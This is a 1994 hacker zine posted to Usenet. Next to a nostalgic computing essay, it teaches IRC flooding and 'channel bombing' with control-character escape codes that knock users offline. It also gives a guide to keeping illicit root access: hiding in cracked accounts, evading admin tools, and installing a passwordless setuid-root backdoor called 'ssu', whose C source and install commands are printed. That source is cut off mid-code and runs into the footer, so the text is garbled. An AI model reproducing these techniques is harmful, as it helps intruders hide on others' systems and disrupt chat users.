\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *VOL:1* NUMBER 2, Oct. 29, 1994 ALL WRONGS DESERVED TORONTO /////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL// \\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\ ///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL// \\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\ ///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL///NET.VANDAL// \\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\\NET.VANDAL\\ /////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ///// An Exercise in Irritainment and Technological Pranking ///// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ NET.VANDAL vol 1, number 2 \\\\\\\\\\\\\\\\\\\\\\\\\\ Brought to you by: The Most Reverend Lucifer Messiah CONTENTS ontent nten .. * F E A T U R E * Where Have We Been? - The Most Reverend Father Looks at the Last 10 Years In Computing. * G O S S I P - R U M O U R - F E E D B A C K * - Spelling Bees, Heroics, IRC tricks * C A B A L T R I C K S * More cool IRC tricks - Channel Bombing and Flooding * S P O R T S * Identity Crisis - Securing Illicit Root Accesses " I have nightmares when I'm asleep, too. " \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ * F E A T U R E * Where Have We Been? - The Most Reverend Father Looks at the Last 10 Years In Computing. I keep copies of all the computer magazines I've ever bought, or received by subscription. Trying really hard not to date myself, I came across a copy of the August 1985 issue of CAD/CAM & Robotics [1] magazine, which immediately caught my attention. The original idea behind this article was to poke a laughing finger at technology, while musing at far we have come. I was in for a rude awakening, which has changed my view entirely. The title of this column was originally intended to invoke a somewhat nostalgic air in the reader. Now, I am shrugging shoulders, looking at my PC, and saying, "My gawd, where have we been?". The advertisement on the inner cover really got me distressed. In it is pictured a wire-frame drawing of something, god knows what, displayed on what had to be nothing less than Super-VGA graphics, on a computer with a base-footprint about the same size around as most desktop cases, but half the height, with one 5 3/4 inch floppy drive, a mouse, and the most wicked looking keyboard I've ever seen. First off, in 1985 we were stuck with CGA graphics, not this incredibly fine-detailed stuff. So I read the advertisement. Here is how it went: --- From the experts in interactive graphics - The Professional's Workstation The InterPro 32 from Intergraph... the multi-tasking, multi-functional workstation for today's professional A personal Computing Resource Powerful processors - including the 32-bit NSC 32032 - and extensive memory equip the InterPro 32 as a standalone computing resource under UNIX System V and PC-DOS. With no hidden processor under your desk. A distributed processing resource For access to distributed corporate computing resources, we built the InterPro 32 with industry-standard networking - Intergraph's ISO 802.3 (Ethernet) architecture - and terminal emulation - the InterPro 32 serves as an Intergraph graphics workstation linkedto a VAX or MicroVAX, a VT100 and VT220, Tektronix 4105, and (via a gateway) IBM 327x. Plus interactive color graphics Even more, the InterPro 32 features high-resolution, interactive color graphics...graphics backed by Intergraph's years of technological leadership. With a palette of 4096 for the image clarity and impact that only color can give. The InterPro 32 - a multi-functional professional workstation. INTERGRAPH Intergraph Sysems Ltd [address, etc] [2] --- Honestly! This is not a circa-1993 IBM advertisement! This ad is 9 years old. Now, in 1985, I thought I had a pretty hot machine. In fact, most of my friends thought I had a pretty hot machine. It was a brand new 8086 XT, blazing at 4.77 Mega-hurts (They hadn't reached 8Mhz yet), and running a CGA, which was the newest in graphics crazes. And it ran PC-DOS. The case was absolutely humoungous, and weighed more than I care to guestimate. It also had a single floppy drive, and a massive 20 Megabyte hard drive. I was often caught laughing at the fact that a lot of major companies were still using the 3M CBC System (Communicate By Card). What is this system, same year, same operating system, but with a 32-bit processor, multitasking, 4096 colours on the graphics (CGA has 4), and all those other options and buzzwords that have only just hit us IBM'ers recently? In fact, curiosity forced me to go through the magazine page by page, ad by ad, to figure out what the resolution of that monitor actually was. One possible answer was on the last page. Tektronix had a monitor, 4096 colours. The resolution: 1280x1024 at 60Hz, non-interlaced! WHAT???? Folks... there is something seriously wrong with this iNTEL thing. We thought we had problems when Microsoft got in caca for violating copyrights, so they had to change things, and remove a few options from their disk stacker. Because of this, the change from DOS 6.00 through to 6.2 was a DOWNgrade. Hardly progress. We thought we had problems when iNTEL released the 80286. The new options in this machine were so unpopular, iNTEL quickly released the 80386, saying that it was what they were trying to do in the first place. The 80286? Try selling one nowadays. Hardly progress indeed! The 80386 sounds not too much more advanced than the 32032 machine mentioned in the ad. Why did it take this long for iNTEL to catch up? In fact, it took about this long for graphics resolutions like the monitor in the ad, to appear for it. Then iNTEL released the 80486. To this day, there is no software that requires an 80486+ machine. The only benefit seems to be in speed. It was an advancement, just not very much. And the Pentium is a very hot chip indeed, in more ways than one. Prone to overheating, and just as expensive as a lower end mini-mainframe. The only thing it does seem to add to the market is yet more speed, because the new opcode list doesn't really show much of an improvement. CPUID is virtually useless, unless you expect that you want to keep upgrading with iNTEL beyond the Pentium. Since no software demands a minimum of a 486 yet, I doubt that there will be one that will require a Pentium. But the Pentium really was a step in the right direction. It has 64 bit buses, a humoungo prefetch queue, a killer internal code bus, and lots of other hardware enhancements well beyond the 80486, and above the 32032 mentioned in the ad above. In hardware detail, the system is excellent. But then again, this is now 9 years after the 32032. It is still a curious fact that the 80x86 series took 9 years for to break Intergraph's 32-bit barrier. I'd be more inclined to buy the mini-mainframe. Unfortunately, I don't know what the most recent descendant to the 32032 is. But I have a feeling it is a whole new article unto itself. [1] Published by Kerrwil Publications. Unknown if it still exists. [2] Editor promises to never quote an entire advertisement again. ////////////////////////////////////////////////////////////////////////////// * G O S S I P - R U M O U R - F E E D B A C K * Gads. Someone told me that my spelling sucks, and suggests that I do something about it. Considering Linux has 2 spell checkers online, I'm not sure why I haven't bothered to ever use them. So look forward to better spelling, I gess. To the dude who forged a letter just to ask me if I thought I was some kind of hero: as a matter of fact, I _do_ think I'm better than other people. My psychiatrist assures me that I have an admirable contact with reality. I mean, I would never say that I'm better than I really am. That would be impossible anyway. [I'm still trying to figure out why you said that. You're mother has always delighted in telling new navy recruits and submissive Bay-streeters how stupid you are, so you're obviously not trying to prove anything.] Sharkboy, thanks for the encouragement, and comments on my IRC article. This issue's CABAL TRICKS should keep you busy. There is a good chance that we will publish a few more IRC columns in the future. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ * C A B A L T R I C K S * More cool IRC tricks - Channel Bombing and Flooding When one considers the vast number of machines being synchronized with each other to suffer the load of a chat system as large and as far reaching as the Internet Relay Chat, it is a marvel that things do not become more spasmodic and erratic than it already does. The object of this issue's Cabal Tricks is to present a few ideas, and to demonstrate ways in which the irc can pushed into a state of chaos. Flooding: -------- Anyone who has ever used irc is well acquainted with the occasional lag, and the continuous net splits. Both of these are symptoms of a site becoming more and more out of sync with the others on the net. Lagging is caused from a certain degree of out-of-sync'edness. Lags are virtually harmless, but terribly annoying, since messages take so long to get to and from users on that client. A net split occurs when the site is so far behind that the irc client running on it must reset itself to catch back up the other systems. This resetting action occurs in response to two conditions. The first being outlined above, and the second, when too much information is forced through to be processed by the irc client. When this happens, it is called flooding. On many sites, piping in a large text file is enough to cause a flood. Although it works, it isn't very creative. As well, on the sites that it doesn't work, flood detection will usually reset the log source first (that source being you). There are many more interesting ways to do it, which will not set off the flood detection on your end, but will usually knock of the other people. Even if it doesn't, you can delight in watching them fume about system speed problems, or annoying screen activity. The included script contains the following flood commands, plus several more: /tsunami The original tsunami flood that all the irc MOTDs warn you against. /sedflood Floods a user with [ENCRYPTED MESSAGE] tokens. A NET.VANDAL reader also suggested a simple command which seems to slow down the channel incredibly if there are lots of people using it. The command is: /ping * It is especially effective if executed several times one right after the other. It manages to avoid flooding, but there is a noticeable choppiness (lag) with irc in that channel. Bombing: ------- In my never-too-humble opinion, bombing is much more interesting than flooding, in any regard. Because of their nature, often not everyone on the channel is affected by channel bombing. It is still interesting to watch when half the channel start bitching and logging off en masse, while the other half sits there wondering what happened. I would like to thank Vassago for Gargoyle, which was heavily relied upon to make this script. And to TSP, a 13 year old pseudo-hacker who easily proves that when Anton Levey said, "There is no mind more genuinely evil than that of a child", he wasn't kidding, for bringing me these irc scripts and a few new ideas. The bomb abuses the fact that channel keys can contain control characters. That is to say, characters created by pressing a key with the key pushed down as well. These characters usually appear as a bolded capital version of the letter that you pressed, or as some other bolded symbol. For instance, +b would looks like a bright 'B'. This makes it possible to create various annoying escape sequences, which will be interpreted as VT100 or ANSI codes to do other things. The script included in the uuencoded file contains several bombs. Here is a list some of the bombs, and what they do: /bdie logs channel users off of irc /bsz constantly invokes auto-zmodem on DOS and Windoze users /bblack makes the screen turn black /bfire prints a blinking red FIRE!!! on the status bar Here is the script. To use it, uudecode it (uuencoding it avoids the control characters from being altered while shipping NET.VANDAL). Then use gunzip to uncompress trick.gz. When you are in irc, type: /load tricks After, you may type /tricks to get a list of the irc tricks available. There is a few undocumented tricks, as well. (hint: One of these undocumented tricks is set off when someone tries to ping you). There is so much more that you can do with these. But I have only planted the seed. Please, if you come up with any good ideas to follow this up with, post them to the list, by mailing to net.van...@hack.pcscav.com. Enjoy. --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- ////////////////////////////////////////////////////////////////////////////// * S P O R T S * Identity Crisis - Securing Illicit Root Accesses Getting root access on a system is tough enough, but what about keeping that access once you've gotten it? After you have successfully cracked root access on a system, it is pretty well mandatory that you get in and out of there as quick as possible, to avoid detection by the system administrator. The easiest way is to run as root from another account. There are at least two good methods if you don't already have your own account on the system. Either way, it is probably a good idea to NOT use your own account if you do have one there. The first one is to also crack a rarely-used account, or the account of someone new to Unix. They usually won't notice any changes to their home directory, and disregard the "Last login ..." message. Creating a directory with a '.' as the first character will keep it invisible enough to the real owner of the account. The following file names are rather good form: ~/.tinrc/.tinrc ~/.emacs/.temp You can likely do your work in these directories without ever getting caught, even if you store stuff there. The second way is to set up your own account. (You have root, remember). Use whichever method at your own discretion. On a large system, this method is probably best. On a smaller system, forget it. Use someone else's account. From that account, you are free to run 'su' and login as root. This way, 'who' doesn't report that root is logged in somewhere that it shouldn't be. This still leaves one problem. If the system administrator changes the root password, which according to Murphy's Law, he will, you are back where you started from. This is where 'ssu' comes in. 'ssu' is a small program (compiled under linux it is 9220 bytes) which runs a program suid as 'root'. The benefit to this over 'su' is that it never asks for a password. If the root password is ever changed, it won't matter. Running 'ssu bash' will give you a root shell, but won't report it as such to anybody. Here is the output of 'w' as reported to the user (in this case, cboyd): --- bash# w 8:12pm up 127 days, 4:39, 2 users, load average: 0.00, 0.01, 0.00 User tty from login@ idle JCPU PCPU what root tty1 5:19pm 2 -bash cboyd ttyS5 7:42pm - bash# bash# whoami root bash# --- The fun is in the reply to the 'whoami' command. Oddly enough, 'who am i' tells the truth, outputting this: --- bash# who am i cinema!cboyd ttyS5 Oct 24 19:42 bash# --- This is no cause for concern though. Here is the output of 'w' as root sees it: --- root:/tmp# w 8:13pm up 127 days, 4:40, 2 users, load average: 0.00, 0.01, 0.00 User tty from login@ idle JCPU PCPU what root tty1 5:19pm 1 1 -w cboyd ttyS5 7:42pm - --- Even if root runs 'w -u cboyd', he will only see that you are running 'bash'. Something else to keep in mind. The UID and UID of ssu will determine which user you will become. Of course, our example makes you root, but I could very easily have made it cboyd, and then hidden the file somewhere. Doing this would give any user who executes ssu access to cboyd's home directory, amongst other things. Because of its innocuous sounding name, you could probably install the program in the /usr/bin directory, which usually contains more executable files than any other directory on the disk, without it ever being noticed. This way, if you lose the account you were using, you can use another one, and still have the same access. Remember to exit the 'su' shell as soon as you are done compiling and installing 'ssu'. There is no need to add unneccessary risk to what you are doing. Here is the source code. Put the following into a file called ssu.c and follow the instructions contained in the code. --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip --- /***************************************************************************** The Secret Super User --------------------- Brought to you by: The Most Reverend Father Lucifer Messiah USAGE: ssu INSTALLATION: Do the following as root or suid as root: cc ssu.c -o ssu strip ssu chown root.bin ssu chmod 4755 ssu mv ssu /usr/bin ******************************************************************************/ #include main (argc,argv) int argc; char **argv; { int gid; int egid; int uid,i; char execute[1000]; gid = getgid(); uid = geteuid(); setuid(uid); egid = getegid(); setregid(egid); for(i=1;i>>>>>>>>> will appear whenever I get to it (good forgeries are welcomed) How do I JOIN NET.VANDAL? ************************ Join the list at any time by sending a "SUBSCRIBE NET.VANDAL" command in the body of a message to net.vandal-requ...@hack.pcscav.com How do I LEAVE NET.VANDAL? ************************* Leave the list at any time by sending an "UNSUBSCRIBE NET.VANDAL" command in the body of a message to net.vandal-requ...@hack.pcscav.com How do I SUBMIT INFO to NET.VANDAL? ********************************** Send your articles addressed to net.van...@hack.pcscav.com <<<<<<<<<<===NET.VANDAL===>>>>>>>>>> -- The Most Reverend Father Lucifer Messiah "If you act like a dumbshit, Subscribe to NET.VANDAL they'll treat you as an equal" Send "SUBSCRIBE" to: - J.R. "Bob" Dobbs net.van...@hack.pcscav.com --- Internet Message Header Follows --- Xref: netcomsv ont.general:14235 tor.general:9690 alt.net.scandal:222 alt.zines:6494 alt.journalism:7876 alt.insults.gangbang:101 can.general:23971 alt.usenet.kooks:10446 alt.activism:76536 alt.2600:29922 alt.news-media:11462 Newsgroups: ont.general, tor.general, alt.net.scandal, alt.zines, alt.journalism, alt.insults.gangbang,can.general,alt.usenet.kooks, alt.activism,alt.2600,alt.news-media Path: netcomsv!netcomsv!decwrl!lll-winken.llnl.gov!uwm.edu!cs.utexas.edu! utnut!utzoo!utdoe!io.org!reptiles.org!geac!gts!lethe!uunorth!csis!lucifer From: luci...@csis.pcscav.com (Lucifer Messiah) Subject: NET.VANDAL: VOLUME 1 ISSUE 2 Message-ID: <1994Oct29.071234.6...@csis.pcscav.com> Organization: More like Disorganization Date: Sat, 29 Oct 1994 07:12:34 GMT X-Newsreader: TIN [version 1.2 PL2] Lines: 553